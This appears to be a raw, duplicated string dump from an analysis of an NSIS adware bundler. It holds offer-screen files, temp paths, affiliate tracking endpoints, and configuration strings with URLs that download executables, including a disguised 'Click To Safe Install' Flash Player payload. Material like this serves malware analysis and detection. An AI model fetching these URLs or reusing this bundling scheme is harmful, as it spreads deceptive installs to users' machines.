OfferScreen_145.html
OfferScreen_145.html
but1.png
but1.png
.PwF~
.PwF~
CompleteScreen.html
CompleteScreen.html
InstallScreen.html
InstallScreen.html
LoadingBar.gif
LoadingBar.gif
`,..VWW
`,..VWW
start-bullet.jpg
start-bullet.jpg
inflate 1.2.2 Copyright 1995-2004 Mark Adler
inflate 1.2.2 Copyright 1995-2004 Mark Adler
GetProcessHeap
GetProcessHeap
nsisunz.dll
nsisunz.dll
NL~%s
NL~%s
o7.6.3
o7.6.3
0*%UP
0*%UP
q.ya!
q.ya!
%u X`i@
%u X`i@
_$,ZS.db
_$,ZS.db
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html.old
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html.old
OF5A05~1.OLD
OF5A05~1.OLD
243.html#1?skipall=0buttons=1
243.html#1?skipall=0buttons=1
matecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
matecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
1953392
1953392
{E1070104-F404-44CE-B556-0622F9D63EE5}
{E1070104-F404-44CE-B556-0622F9D63EE5}
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
ementById('btnJSClose').style.marginLeft="35px";
ementById('btnJSClose').style.marginLeft="35px";
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoBD.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoBD.tmp
etElementById('btnJSClose').style.marginLeft="35px";
etElementById('btnJSClose').style.marginLeft="35px";
c:\%original file name%.exe
c:\%original file name%.exe
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nstB2.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nstB2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1704186
1704186
420088014
420088014
1638636
1638636
1835178
1835178
1507664
1507664
1638642
1638642
1638626
1638626
1114208
1114208
1966388
1966388
1245508
1245508
1507604
1507604
http://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg
http://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg
http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe
http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe
http://www.fglasspeast.com/FCL_Co_v4.php
http://www.fglasspeast.com/FCL_Co_v4.php
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php#http://www.stsunsetwest.com/DS_trackstats_mon_v2.php#CA#http://www.stsunsetwest.com/DS_AdvAffiliateId.php#http://www.stsunsetwest.com/DS_wrapper_details_v2.php#http://www.wajam.com/download/wajam_validate.exe#38/145/176/184/226/234/235/270/239/243/251/260/275/277/283/291/301/320/339/
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php#http://www.stsunsetwest.com/DS_trackstats_mon_v2.php#CA#http://www.stsunsetwest.com/DS_AdvAffiliateId.php#http://www.stsunsetwest.com/DS_wrapper_details_v2.php#http://www.wajam.com/download/wajam_validate.exe#38/145/176/184/226/234/235/270/239/243/251/260/275/277/283/291/301/320/339/
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php
http://www.stsunsetwest.com/DS_trackstats_mon_v2.php
http://www.stsunsetwest.com/DS_trackstats_mon_v2.php
http://www.stsunsetwest.com/DS_AdvAffiliateId.php
http://www.stsunsetwest.com/DS_AdvAffiliateId.php
http://www.wajam.com/download/wajam_validate.exe
http://www.wajam.com/download/wajam_validate.exe
243~http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
243~http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip
http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip
https://sp-storage.spccinta.com/sp-downloader.exe
https://sp-storage.spccinta.com/sp-downloader.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip
https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe
https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip
http://wajam-download.com/download/wajam_download_v2.exe
http://wajam-download.com/download/wajam_download_v2.exe
http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe
http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip
http://www.reghelper.com/rh/RegistryHelperSetupIM.exe
http://www.reghelper.com/rh/RegistryHelperSetupIM.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip
http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
\Program Files\Internet Explorer\iexplore.exe" -nohome
install_flashplayer11x32_mssd_aaa_aih.exe
http://downloadupdates.in/MA1/flash_thankyou2.php
http://www.stsunsetwest.com/DS_wrapper_details_v2.php
Flash Player~http://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg~EI~http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe~$BrowserToPop~0~0~~http://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip~install_flashplayer11x32_mssd_aaa_aih.exe~http://downloadupdates.in/MA1/flash_thankyou2.php~3C~1~1~1~~~~~0~0~~OW
http://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip
fast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0
38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0
235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0
p://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip
970.exe
ps://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1
ge.exe~null~0~0
/s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v11-Jul-2014.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
%original file name%.exe_1812_rwx_00DA4000_00001000:
callback%d